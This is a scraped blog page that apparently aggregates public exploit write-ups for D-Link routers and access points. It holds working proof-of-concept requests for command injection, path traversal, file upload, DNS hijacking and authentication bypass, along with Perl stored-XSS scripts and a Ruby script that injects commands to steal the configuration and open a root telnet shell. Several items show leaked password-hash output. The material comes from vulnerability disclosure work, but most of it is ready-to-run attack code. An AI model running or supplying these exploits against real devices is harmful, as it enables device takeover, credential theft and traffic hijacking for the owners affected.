Document Title:
===============
D-Link DWL-2600AP - (Authenticated) OS Command Injection (Restore Configuration)
Product & Service Introduction:
===============================
The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP.
Affected Product(s):
====================
Product: D-Link DWL-2600AP (Web Interface)
Exploitation Technique:
=======================
Local
Severity Level:
===============
HIGH
CVE: CVE-2019-20499
CVE: CVE-2019-20500
CVE: CVE-2019-20501
Base Score (CVSS):
===============
7.8
===============
Request Method(s):
[+] POST
URL Path :
[+] /admin.cgi?action=config_restore
Vulnerable POST Form Data Parameter:
[+] configRestore
[+] configServerip
===========================
Device Firmware version :
[+] 4.2.0.15
Hardware Version :
[+] A1
Device name :
[+] D-Link AP
Product Identifier :
[+] WLAN-EAP
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by local authenticated attackers.
there is no input validation on the POST Form Data Parameter "configRestore"
and the Form Data Parameter "configServerip" (the input are passed directly to TFTP command) which allow attackers to execute arbitrary Operating System Commands on the device for malicious purposes.
The attacker has to know the credentials in order to access the Panel .
For security demonstration or to reproduce the vulnerability follow the provided information in the attachement provided Screenshot2.jpg .
--- PoC Session Logs ---
POST /admin.cgi?action=config_restore HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 357
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data;
User-Agent: Xxxxxxxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/admin.cgi?action=config_restore
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: sessionHTTP=UQAafLpviZXbWDQpJAnrNmEJoFQIBAcX; clickedFolderFrameless=43%5E
------WebKitFormBoundary4ZAwHsdySFjwNXxE
Content-Disposition: form-data; name="optprotocol"
up
------WebKitFormBoundary4ZAwHsdySFjwNXxE
Content-Disposition: form-data; name="configRestore"
;whoami;
------WebKitFormBoundary4ZAwHsdySFjwNXxE
Content-Disposition: form-data; name="configServerip"
;cat /var/passwd;cat /var/passwd
------WebKitFormBoundary4ZAwHsdySFjwNXxE--
----------->Response----------->
HTTP/1.0 200 OK
Content-Type: text/html; charset=UTF-8
/usr/bin/tftp: option requires an argument -- r
BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary.
Usage: tftp [OPTIONS] HOST [PORT]
Transfer a file from/to tftp server
Options:
-l FILE Local FILE
-r FILE Remote FILE
-g Get file
-p Put file
-b SIZE Transfer blocks of SIZE octets
sh: whoami: not found
sh: whoami: not found
root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh
admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash
nobody:x:99:99:nobody:/:/bin/false
Note : for testing put the values in the fields like this :
;command1;same_command1;command2;command2
----+Discovered By Raki Ben Hamouda----+
Document Title:
===============
D-Link DWL-2600AP - (Authenticated) OS Command Injection (Save Configuration)
Product & Service Introduction:
===============================
The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP.
Affected Product(s):
====================
Product: D-Link DWL-2600AP (Web Interface)
Exploitation Technique:
=======================
Local
Severity Level:
===============
HIGH
Base Score (CVSS):
===============
7.8
===============
Request Method(s):
[+] POST
URL Path :
[+] /admin.cgi?action=config_save
Vulnerable POST Form Data Parameter:
[+] configBackup
[+] downloadServerip
==========================
Device Firmware version :
[+] 4.2.0.15
Hardware Version :
[+] A1
Device name :
[+] D-Link AP
Product Identifier :
[+] WLAN-EAP
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote or local authenticated attackers.
there is no input validation on the POST Form Data Parameter "configBackup"
and the Form Data Parameter "downloadServerip" (the input are passed directly to TFTP command) which allow attackers to execute arbitrary Operating System Commands on the device for malicious purposes.
The attacker has to know the credentials in order to access the Panel .
For security demonstration or to reproduce the vulnerability follow the provided information in the attachement provided Screenshot3.jpg .
--- PoC Session Logs ---
POST /admin.cgi?action=config_save HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 114
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Xxxxxxxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/admin.cgi?action=config_save
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: sessionHTTP=PENcqbtRRuvmuZfPZnzuUddVIEAPADBp; clickedFolderFrameless=43%5E
check_tftp=up&configBackup=;whoami;whoami;.xml&downloadServerip=;cat /var/passwd;cat /var/passwd
----------->Response----------->
HTTP/1.0 200 OK
Content-Type: text/html; charset=UTF-8
/usr/bin/tftp: option requires an argument -- r
BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary.
Usage: tftp [OPTIONS] HOST [PORT]
Transfer a file from/to tftp server
Options:
-l FILE Local FILE
-r FILE Remote FILE
-g Get file
-p Put file
-b SIZE Transfer blocks of SIZE octets
sh: whoami: not found
sh: whoami: not found
sh: .xml: not found
root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh
admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash
nobody:x:99:99:nobody:/:/bin/false
Note : for testing put the values in the fields like this :
;command1;same_command1;command2;etc...
----+Discovered By Raki Ben Hamouda----+
Document Title:
===============
D-Link DWL-2600AP - (Authenticated) OS Command Injection (Upgrade Firmware)
Product & Service Introduction:
===============================
The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP.
Affected Product(s):
====================
Product: D-Link DWL-2600AP (Web Interface)
Exploitation Technique:
=======================
Local
Severity Level:
===============
HIGH
Base Score (CVSS):
===============
7.8
===============
Request Method(s):
[+] POST
URL Path :
[+] /admin.cgi?action=upgrade
Vulnerable POST Form Data Parameter:
[+] firmwareRestore
[+] firmwareServerip
===========================
Device Firmware version :
[+] 4.2.0.15
Hardware Version :
[+] A1
Device name :
[+] D-Link AP
Product Identifier :
[+] WLAN-EAP
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by local authenticated attackers.
there is no input validation on the POST Form Data Parameter "firmwareRestore"
and the Form Data Parameter "firmwareServerip" (the input are passed directly to TFTP command) which allow attackers to execute arbitrary Operating System Commands on the device for malicious purposes.
The attacker has to know the credentials in order to access the Panel .
For security demonstration or to reproduce the vulnerability follow the provided information in the attachement provided Screenshot1.jpg .
--- PoC Session Logs ---
POST /admin.cgi?action=upgrade HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 525
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data;
User-Agent: xxxxxxxxw
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/admin.cgi?action=upgrade
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: sessionHTTP=PENcqbtRRuvmuZfPZnzuUddVIEAPADBp; clickedFolderFrameless=43%5E
------WebKitFormBoundaryBy0MsFaBOhdU6YJL
Content-Disposition: form-data; name="optprotocol"
up
------WebKitFormBoundaryBy0MsFaBOhdU6YJL
Content-Disposition: form-data; name="firmwareRestore"
;whoami;whoami
------WebKitFormBoundaryBy0MsFaBOhdU6YJL
Content-Disposition: form-data; name="firmwareServerip"
;cat /var/passwd;cat /var/passwd
------WebKitFormBoundaryBy0MsFaBOhdU6YJL
Content-Disposition: form-data; name="update.device.packet-capture.stop-capture"
up
------WebKitFormBoundaryBy0MsFaBOhdU6YJL--
----------->Response----------->
HTTP/1.0 200 OK
Content-Type: text/html; charset=UTF-8
/usr/bin/tftp: option requires an argument -- r
BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary.
Usage: tftp [OPTIONS] HOST [PORT]
Transfer a file from/to tftp server
Options:
-l FILE Local FILE
-r FILE Remote FILE
-g Get file
-p Put file
-b SIZE Transfer blocks of SIZE octets
sh: whoami: not found
sh: whoami: not found
root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh
admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash
nobody:x:99:99:nobody:/:/bin/false
Note : for testing put the values in the fields like this :
;command1;same_command1;command2;etc...
----+Discovered By Raki Ben Hamouda----+
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863149596
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: [DLink DVGN5402SP Multiple Vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [www.dlink.com/]
# Versions Reported: [Multiple - See below]
# CVE-IDs: [CVE-2015-7245 + CVE-2015-7246 + CVE-2015-7247]
*DLink DVGN5402SP File Path Traversal, Weak Credentials Management, and
Sensitive Info Leakage Vulnerabilities*
*Vulnerable Models, Firmware, Hardware versions*
DVGN5402SP Web Management
Model Name : GPN2.4P21CCN
Firmware Version : W1000CN00
Firmware Version :W1000CN03
Firmware Version :W2000EN00
Hardware Platform :ZS
Hardware Version :Gpn2.4P21C_WIFIV0.05
Device can be managed through three users:
1. super full privileges
2. admin full privileges
3. support restricted user
*1. Path traversal*
Arbitrary files can be read off of the device file system. No
authentication is required to exploit this vulnerability.
*CVE-ID*: CVE-2015-7245
*HTTP Request *
POST /cgibin/webproc HTTP/1.1
Host: <IP>:8080
UserAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101
Firefox/39.0 Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
AcceptLanguage: enUS,en;q=0.5
AcceptEncoding: gzip, deflate
Referer: http://<IP>:8080/cgibin/webproc
Cookie: sessionid=abcdefgh; language=en_us; sys_UserName=super
Connection: keepalive
ContentType: application/xwwwformurlencoded
ContentLength: 223
getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/shadow&var%3Amenu=setup&var%3Apage=connected&var%
&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh
*HTTP Response*
HTTP/1.0 200 OK
pstVal>name:getpage; pstVal>value:html/main.html
pstVal>name:getpage; pstVal>value:html/index.html
pstVal>name:errorpage;
pstVal>value:../../../../../../../../../../../etc/shadow
pstVal>name:var:menu; pstVal>value:setup
pstVal>name:var:page; pstVal>value:connected
pstVal>name:var:subpage; pstVal>value:
pstVal>name:objaction; pstVal>value:auth
pstVal>name::username; pstVal>value:super
pstVal>name::password; pstVal>value:super
pstVal>name::action; pstVal>value:login
pstVal>name::sessionid; pstVal>value:1ac5da6b
Connection: close
Contenttype: text/html
Pragma: nocache
CacheControl: nocache
setcookie: sessionid=1ac5da6b; expires=Fri, 31Dec9999 23:59:59 GMT;
path=/
#root:<hash_redacted>:13796:0:99999:7:::
root:<hash_redacted>:13796:0:99999:7:::
#tw:<hash_redacted>:13796:0:99999:7:::
#tw:<hash_redacted>:13796:0:99999:7:::
*2. Use of Default, HardCoded Credentials**CVE-ID*: CVE-2015-7246
The device has two system user accounts configured with default passwords
(root:root, tw:tw).
Login tw is not active though. Anyone could use the default password to
gain administrative control through the Telnet service of the system (when
enabled) leading to integrity, loss of confidentiality, or loss of
availability.
*3.Sensitive info leakage via device running configuration backup *
*CVE-ID*: CVE-2015-7247
Usernames, Passwords, keys, values and web account hashes (super & admin)
are stored in cleartext and not masked. It is noted that restricted
'support' user may also access this config backup file from the portal
directly, gather clear-text admin creds, and gain full, unauthorized access
to the device.
--
Best Regards,
Karn Ganeshen
ipositivesecurity.blogspot.in
# Exploit Title: D-Link DSR-250N 3.12 - Denial of Service (PoC)
# Google Dork: N/A
# Author: RedTeam Pentesting GmbH
# Date: 2020-10-03
# Exploit Author: Kiko Andreu (kikoas1995) & Daniel Monzón (stark0de)
# Vendor Homepage: https://www.dlink.com
# Software Link: https://www.dlink.com/en/products/dsr-250n-wireless-n-unified-service-router
# Version: 3.17B
# CVE : CVE-2020-26567
Advisory: Denial of Service in D-Link DSR-250N
RedTeam Pentesting discovered a Denial-of-Service vulnerability in the
D-Link DSR-250N device which allows unauthenticated attackers in the
same local network to execute a CGI script which reboots the device.
Details
=======
Product: D-Link DSR-250N
Affected Versions: 3.12 and potentially later
Fixed Versions: 3.17B
Vulnerability Type: DoS
Security Risk: low
Vendor URL: https://www.dlink.com/en/products/dsr-250n-wireless-n-unified-service-router
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-002
Advisory Status: published
CVE: CVE-2020-26567
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26567
Introduction
============
"The D-Link Wireless N Unified Service Router (DSR-250N) provides
enhanced security, functionality and performance over a traditional VPN
router without the complexity of a full firewall solution. The D-Link
Wireless N Unified Service Router is a cost-effective, high performance
solution for securing a small business network."
(from the vendor's homepage)
More Details
============
During a penetration test, the firmware for the D-Link DSR-250N router
was downloaded from D-Links official website[1] and extracted for
further analysis. It was then confirmed that CGI scripts exist on the
router that can be directly accessed with a web browser, without any
authentication. In particular, the script "upgradeStatusReboot.cgi"
executes the command to reboot the device. Its contents are:
------------------------------------------------------------------------
#!/bin/sh
echo Content-type: text/plain
echo ""
stat=`/sbin/reboot -d 8 &`
echo $stat
------------------------------------------------------------------------
Executing this script renders the device unusable for the time of the
reboot. In tests, it turned out that the device needs roughly four
minutes to complete a reboot. As a consequence, any network using the
device as a switch or router is not accessible during that time, too.
In the penetration test, the router's web interface was available
directly over the Internet. According to the vendor, the web interface
is by default disabled for the WAN interface.
Proof of Concept
================
An HTTP GET request to the CGI script "upgradeStatusReboot.cgi" will
reboot the device:
------------------------------------------------------------------------
$ curl -k -s https://IP-ADDRESS/scgi-bin/upgradeStatusReboot.cgi
------------------------------------------------------------------------
Workaround
==========
Access to the D-Link DSR-250N's web interface should only be enabled for
administrators, for example by only allowing access from specific IP
addresses in the firewall. Access over the WAN interface should also be
disabled if it was enabled manually.
Fix
===
A preview firmware version named 3.17B which should correct the issue
was received at the end of September from the vendor. RedTeam Pentesting
was not able to verify the fix due to lack of access to a test device.
However, the formerly accessible CGI script is no longer part of the
firmware.
Security Risk
=============
No authentication is needed to excute the CGI script and thereby reboot
the device. Attackers might abuse this behaviour for targeted
denial-of-service-attacks against D-Link customers, since rebooting the
device interrupts access to networks relying on this device for routing
or switching purposes. However, the attack is only possible if the
attacker resides on the same network, and no further information can be
gathered or control over the devices be obtained. Therefore, the
vulnerability is rated as a low risk.
Timeline
========
2020-06-29 Vulnerability identified
2020-07-03 Customer approved disclosure to vendor
2020-07-03 Requested security contact from vendor via web formular
2020-07-03 Vendor replied with contact information
2020-07-07 Advisory provided to vendor
2020-09-28 Vendor provided fixed version to RedTeam Pentesting
2020-10-05 CVE ID requested
2020-10-06 CVE ID assigned
2020-10-08 Advisory released
References
==========
[1] https://support.dlink.com/ProductInfo.aspx?m=DSR-250N
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
# Exploit Title: D-Link DSP-W Arbitrary Arbitrary file upload
# Date: 30/06/2015
# Exploit Author: DNO
# Vendor Homepage: [link]
# Version: w110 v1.05b01
# Tested on: linux
# CVE : N/A
========================================
the only 'filtering' on this resources appears to be a sprintf()
call which statically prefixes a submitted 'dev' argument with '/www'.
However,
if a HTTP request is performed without a 'dev' argument at all, the
sprintf() call is never reached,
and a fully-qualified path can be provided in the 'path' parameter -
bypassing the upload path restriction.
***************
# Upload arbitrary files to the device.
echo 'Some String' > test.txt
curl \
-X POST \
-i \
-F name=@test.txt \
--http1.0 \
'192.168.1.3/web_cgi.cgi?&request=UploadFile&path=/etc/'
========================================
# Exploit Title: D-Link DSP-W Diagnostic Information " Get info"
# Date: 30/06/2015
# Exploit Author: DNO
# Version: w110 v1.05b01
# Tested on: linux
# CVE : N/A
========================================
Severity Level:
===============
High
===============
Patches made to lighttpd by the vendor of this device allows an attacker to
query the device, without authentication, for the following information:
# Current WLAN SSIDs
# Current WLAN channels
# LAN and WAN MAC addressing
# Current firmware version information
# Hardware version information
Although not sensitive information, it may allow for identification of
devices running vulnerable firmware versions.
=========================================
# Information query.
curl \
192.168.1.3/mplist.txt
========================================
#ruby poc
----
# DSP-W110-Lighttpd PoC.
require 'pp'
require 'optparse'
require 'restclient'
# Set defaults and parse command line arguments
options = {}
options[:addr] = "192.168.0.60"
options[:port] = 80
OptionParser.new do |option|
option.on("--address [ADDRESS]", "Destination hostname or IP") do |a|
options[:addr] = a
end
option.on("--port [PORT]", "Destination TCP port") do |p|
options[:port] = p
end
option.parse!
end
# Define which actions we will be using.
actions = [
{
:name => "Get device information",
:call => "txt_parser",
:path => "mplist.txt",
},
{
:name => "Snatch configuration",
:call => "noop",
:path => "HNAP1",
:cookies => { :cookie => "`cp /etc/co* /www/`" }
},
{
:name => "Fetch configuration",
:call => "conf_writer",
:path => "config.sqlite",
},
{
:name => "Enable telnet (root)",
:call => "noop",
:path => "HNAP1",
:cookies => { :cookie => "`telnetd -l/bin/sh`" }
}
]
def noop(val)
return
end
def txt_parser(txt)
txt.split(/\r?\n/).each do |line|
puts " #{line}"
end
end
def conf_writer(txt)
begin
f = File.open('./config.sqlite', 'wb')
rescue => e
puts "[!] Failed to open config.sqlite for writing #{e.message}"
end
f.write(txt)
f.close
puts "[*] Configuration fetched into 'config.sqlite'"
end
# Iterate over all actions and attempt to execute.
url = "http://#{options[:addr]}:#{options[:port]}"
puts "[!] Attempting to extract information from #{url}"
actions.each do |action|
# Fire the request and ensure a 200 OKAY.
begin
response = RestClient.get(
"#{url}/#{action[:path]}",
{:cookies => action[:cookies]}
)
rescue
puts "[!] Failed to query remote host."
abort
end
if response.code != 200
puts "[-] '#{action[:name]}' failed with response: #{response.code}"
next
end
# Send to the processor.
puts "[*] #{action[:name]} request succeeded."
send(action[:call], response.body())
end
===================================
contact me FB : FB.COM/haker.dyno
Copyright © 2015 /DNO/
D-Link DSL-526B ADSL2+ AU_2.01
Unauthenticated Remote DNS Change
Copyright 2015 (c) Todor Donev
<todor.donev at gmail.com>
http://www.ethical-hacker.org/
https://www.facebook.com/ethicalhackerorg
No description for morons,
script kiddies & noobs !!
Disclaimer:
This or previous programs is for Educational
purpose ONLY. Do not use it without permission.
The usual disclaimer applies, especially the
fact that Todor Donev is not liable for any
damages caused by direct or indirect use of the
information or functionality provided by these
programs. The author or any Internet provider
bears NO responsibility for content or misuse
of these programs or any derivatives thereof.
By using these programs you accept the fact
that any damage (dataloss, system crash,
system compromise, etc.) caused by the use
of these programs is not Todor Donev's
responsibility.
Use them at your own risk!
[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1" | grep "var dns2"
var dns2 = '8.8.8.8';
#!/usr/bin/perl
#
# Date dd-mm-aaaa: 13-02-2015
# Exploit for D-Link DSL-500B G2
# Cross Site Scripting (XSS Injection) Stored in todmngr.tod URL Filter
# Developed by Mauricio Corrêa
# XLabs Information Security
# WebSite: www.xlabs.com.br
#
# CAUTION!
# This exploit disables some features of the modem,
# forcing the administrator of the device, accessing the page to reconfigure the modem again,
# occurring script execution in the browser of internal network users.
#
# Use with caution!
# Use at your own risk!
#
use strict;
use warnings;
use diagnostics;
use LWP::UserAgent;
use HTTP::Request;
use URI::Escape;
my $ip = $ARGV[0];
my $user = $ARGV[1];
my $pass = $ARGV[2];
if (@ARGV != 3){
print "\n";
print "XLabs Information Security www.xlabs.com.br\n";
print "Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in URL Filter\n";
print "Developed by Mauricio Correa\n";
print "Contact: mauricio\@xlabs.com.br\n";
print "Usage: perl $0 http:\/\/host_ip\/ user pass\n";
}else{
$ip = $1 if($ip=~/(.*)\/$/);
print "XLabs Information Security www.xlabs.com.br\n";
print "Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in URL Filter\n";
print "Developed by Mauricio Correa\n";
print "Contact: mauricio\@xlabs.com.br\n";
print "[+] Exploring $ip\/ ...\n";
my $payload = "%3Cscript%20src%3D%27%2f%2fxlabs.com.br%2fxssi.js%27%3E%3C%2fscript%3E";
my $ua = new LWP::UserAgent;
my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );
$hdrs->authorization_basic($user, $pass);
chomp($ip);
print "[+] Preparing exploit...\n";
my $url_and_xpl = "$ip/todmngr.tod?action=set_url&TodUrlAdd=GameOver$payload&port_num=1234";
my $req = new HTTP::Request("GET",$url_and_xpl,$hdrs);
print "[+] Prepared!\n";
print "[+] Requesting and Exploiting...\n";
my $resp = $ua->request($req);
if ($resp->is_success){
print "[+] Successfully Requested!\n";
my $url = "$ip/todmngr.tod?action=urlview";
$req = new HTTP::Request("GET",$url,$hdrs);
print "[+] Checking that was explored...\n";
my $resp2 = $ua->request($req);
if ($resp2->is_success){
my $resultado = $resp2->as_string;
if(index($resultado, uri_unescape($payload)) != -1){
print "[+] Successfully Exploited!";
}else{
print "[-] Not Exploited!";
}
}
}else {
print "[-] Ops!\n";
print $resp->message;
}
}
#!/usr/bin/perl
#
# Date dd-mm-aaaa: 13-02-2015
# Exploit for D-Link DSL-500B G2
# Cross Site Scripting (XSS Injection) Stored in todmngr.tod
# Developed by Mauricio Corrêa
# XLabs Information Security
# WebSite: www.xlabs.com.br
#
# CAUTION!
# This exploit disables some features of the modem,
# forcing the administrator of the device, accessing the page to reconfigure the modem again,
# occurring script execution in the browser of internal network users.
#
# Use with caution!
# Use at your own risk!
#
use strict;
use warnings;
use diagnostics;
use LWP::UserAgent;
use HTTP::Request;
use URI::Escape;
my $ip = $ARGV[0];
my $user = $ARGV[1];
my $pass = $ARGV[2];
if (@ARGV != 3){
print "\n";
print "XLabs Information Security www.xlabs.com.br\n";
print "Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in todmngr.tod\n";
print "Developed by Mauricio Correa\n";
print "Contact: mauricio\@xlabs.com.br\n";
print "Usage: perl $0 http:\/\/host_ip\/ user pass\n";
}else{
$ip = $1 if($ip=~/(.*)\/$/);
print "XLabs Information Security www.xlabs.com.br\n";
print "Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in todmngr.tod\n";
print "Developed by Mauricio Correa\n";
print "Contact: mauricio\@xlabs.com.br\n";
print "[+] Exploring $ip\/ ...\n";
my $payload = "%3Cscript%3Ealert%28%27XLabs%27%29%3C%2fscript%3E";
my $ua = new LWP::UserAgent;
my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );
$hdrs->authorization_basic($user, $pass);
chomp($ip);
print "[+] Preparing exploit...\n";
my $url_and_xpl = "$ip/todmngr.tod?action=add&username=$payload&mac=AA:BB:CC:DD:EE:FF&days=1&start_time=720&end_time=840";
my $req = new HTTP::Request("GET",$url_and_xpl,$hdrs);
print "[+] Prepared!\n";
print "[+] Requesting and Exploiting...\n";
my $resp = $ua->request($req);
if ($resp->is_success){
print "[+] Successfully Requested!\n";
my $url = "$ip/todmngr.tod?action=view";
$req = new HTTP::Request("GET",$url,$hdrs);
print "[+] Checking that was explored...\n";
my $resp2 = $ua->request($req);
if ($resp2->is_success){
my $resultado = $resp2->as_string;
if(index($resultado, uri_unescape($payload)) != -1){
print "[+] Successfully Exploited!";
}else{
print "[-] Not Exploited!";
}
}
}else {
print "[-] Ops!\n";
print $resp->message;
}
}
# Exploit Title: D-Link DSL 3782 - Authentication Bypass
# Vendor Homepage: https://eu.dlink.com
# Version: A1_WI_20170303 || SWVer="V100R001B012" FWVer="3.10.0.24" FirmVer="TT_77616E6771696F6E67"
# Category: Webapps
# Exploit Author: Giulio Comi
# CVE : CVE-2018-8898
# Date: 20/05/2018
# Description
# The web panel of D-Link DSL 3782 version (A1_WI_20170303) does not release a token ID (e.g. a session cookie) that identifies the logged in administrator, but only relies # on a server-side timeout that lasts few minutes.
# In addition, a server-side mitigation in place prompts for login credentials everytime the webroot is loaded, but does leave the application endpoints unprotected # and affected by this authentication bypass.
# Therefore, after a valid login of the administrator the web panel does not distinguish valid HTTP requests from the admin and the ones that come from other users.
# This way, an attacker can script an automatic routine that perform unwanted actions such as arbitrary modifications to router and SSIDs passwords and configurations.
# Some of the possible actions for retrieving important information
# GET http://192.168.1.1/romfile.cfg ---> retrieve the complete settings of the router (all credentials included)
# GET http://192.168.1.1/cgi-bin/get/New_GUI/Settings_24.asp ---> retrieve the password for SSID of 2.4Ghz
# GET http://192.168.1.1/cgi-bin/get/New_GUI/Settings_5.asp ---> retrieve the password for SSID of 5.0Ghz
# GET http://192.168.1.1/cgi-bin/New_GUI/GuestZone.asp ---> retrieve the password for Guest network, if present
# For POST requests that makes changes to passwords, SSIDs name and configurations, a 'sessionKey' value is used by the web application to prevent Cross-site request forgery (CSRF) attacks.
# However, this value can be retrieved with this Authentication Bypass issue with the following GET request:
# 'GET http://192.168.1.1/cgi-bin/get/New_GUI/get_sessionKey.asp'
# For example, the below POST request allows to change the Web Interface Administrator's password:
curl --data "Password=[NEW_PASSWORD_SET_BY_THE_ATTACKER]" \
--data "sessionKey=$(curl -sS http://192.168.1.1/cgi-bin/get/New_GUI/get_sessionKey.asp)" \
http://192.168.1.1/cgi-bin/New_GUI/Set/Admin.asp
# Some other possible actions for altering the configurations:
# POST http://192.168.1.1/cgi-bin/New_GUI/WiFi_loding.asp ---> change passwords of the SSIDs
# POST http://192.168.1.1/cgi-bin/New_GUI/Set/firmware_upgrade.asp ---> upgrade firmware
# POST http://192.168.1.1/cgi-bin/New_GUI/Set/reboot_wait.asp ---> reboot router
# POST /cgi-bin/New_GUI/Set/config_upgrade.asp ---> upload a new configuration file ('romfile.cfg')
# Note 1: Since the router misses a network segretation, a user that has access to the Guest network could also perform this attack.
# Note 2: Web panels exposed to the Internet allows anonymous attacker to leverage this vulnerability and possibly takeover the router.
# Note 3: Others forks of the firmware and software versions have not been tested.
# Timeline
# 26/03 Vendor contacted
# 28/03 Vendor replied
# 05/04 Vendor requested more information to track the vulnerable firmware version 'because the D-Link DSL 3782 have many forks'
# 05/04 I have sent the detailed information of firmware and software version retrievable from:
# - the web panel graphic ('A1_WI_20170303')
# - the romfile.cfg ('SWVer="V100R001B012" FWVer="3.10.0.24" FirmVer="TT_77616E6771696F6E67"')
# 20/04 requested an update, no response
# 03/05 requested an update, no response
# 07/05 requested an update, still no response from the security response team
# 20/05 full disclosure
D-Link DSL-2780B DLink_1.01.14
Unauthenticated Remote DNS Change
Copyright 2015 (c) Todor Donev
<todor.donev at gmail.com>
http://www.ethical-hacker.org/
https://www.facebook.com/ethicalhackerorg
No description for morons,
script kiddies & noobs !!
Disclaimer:
This or previous programs is for Educational
purpose ONLY. Do not use it without permission.
The usual disclaimer applies, especially the
fact that Todor Donev is not liable for any
damages caused by direct or indirect use of the
information or functionality provided by these
programs. The author or any Internet provider
bears NO responsibility for content or misuse
of these programs or any derivatives thereof.
By using these programs you accept the fact
that any damage (dataloss, system crash,
system compromise, etc.) caused by the use
of these programs is not Todor Donev's
responsibility.
Use them at your own risk!
[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsSecondary=8.8.4.4&dnsIfcsList=&dnsRefresh=1" 0&> /dev/null <&1
#[+] Author: SATHISH ARTHAR
#[+] Exploit Title: Dlink Wireless Router Password File Access Exploit (Local File Inclusion)
#[+] Date: 07-07-2015
#[+] Platform: Hardware
#[+] Tested on: linux
#[+] Vendor: http://www.dlink.co.in
#[+] Product web page: http://www.dlink.co.in
#[+] Affected version:
DSL-2750u (firmware: IN_1.08 )
DSL-2730u (firmware: IN_1.02 )
#[+] Sites: sathisharthars.wordpress.com
#[+] Twitter: @sathisharthars
#[+] Thanks: offensive security (@offsectraining)
#########################################################################
Dlink Wireless Router Password File Access Exploit
#########################################################################
Summary:
The Dlink DSL-2750u and DSL-2730u wireless router improves
your legacy Wireless-G network. It is a simple, secure way to share your
Internet connection and allows you to easily surf the Internet, use email,
and have online chats. The quick, CD-less setup can be done through a web
browser. The small, efficient design fits perfectly into your home and
small office.
Desc:
The router suffers from an authenticated file inclusion vulnerability
(LFI) when input passed thru the 'getpage' parameter to 'webproc' script is
not properly verified before being used to include files. This can be exploited
to include files from local resources.
Tested on: mini_httpd/1.19 19dec2003
===============================================================
GET /cgi-bin/webproc?var:page=wizard&var:menu=setup&getpage=/etc/passwd HTTP/1.1
Host: 192.168.31.10
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sessionid=2b48aa9b
Connection: keep-alive
HTTP/1.0 200 OK
Content-type: text/html
Pragma: no-cache
Cache-Control: no-cache
